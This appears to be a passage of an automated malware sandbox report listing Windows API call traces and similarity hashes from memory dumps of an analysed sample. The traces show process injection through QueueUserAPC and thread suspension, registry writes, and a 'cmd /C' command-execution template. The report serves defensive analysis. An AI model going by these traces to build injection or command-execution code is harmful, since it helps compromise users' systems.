    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
